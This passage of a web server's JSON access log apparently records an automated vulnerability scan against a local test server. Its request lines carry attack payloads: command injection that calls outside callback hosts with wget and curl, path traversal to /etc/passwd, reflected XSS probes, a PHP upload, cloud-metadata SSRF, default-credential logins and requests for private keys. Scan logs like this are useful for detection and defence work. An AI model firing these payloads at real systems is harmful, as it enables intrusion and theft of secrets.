AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%2229KD1vYjmdD59FSJlAZyv3E5AkQ%22%3b%20%3f%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/kibana HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/config/security.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%3B/monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/get.php?subdomain=ca28fg0smpvbd3qg07h0szu5cm3qw9wfe.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0A/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/68 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"{\x22methodInput\x22:[{\x22type\x22:\x22ClusterComputeResource\x22,\x22value\x22: null,\x22serverGuid\x22: null}]}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxwebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /privatekey.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /product-downloads/29KD1xOD2jmPBMUotF7fJGNufkk.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //wp-admin/options-general.php/%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/script%3E?page=securimage-wp-options%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"http:","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sysmgmt/2015/bmc/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/tree.php?subdomain=ca28fg0smpvbd3qg07h0q9pbzbrhnhkwc.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/69 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /minio/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cdn-cgi/image/width/https://ca28fg0smpvbd3qg07h0pd8eckypak1b8.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client_secrets.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"http:","request":"GET /cs/Satellite?destpage=\x22&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//ca28fg0smpvbd3qg07h0zrcief5gbashy.oast.livePa_Note%27","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/file_transfer.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cu.html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.433","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/localJob.php?session=fail;wget http://ca28fg0smpvbd3qg07h074bode71zbgq9.oast.live; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.486","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.514","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"{\x0D\x0A \x22user\x22: {\x0D\x0A \x22$func\x22: \x22var_dump\x22\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/requestreset HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/guestimage.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/70 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 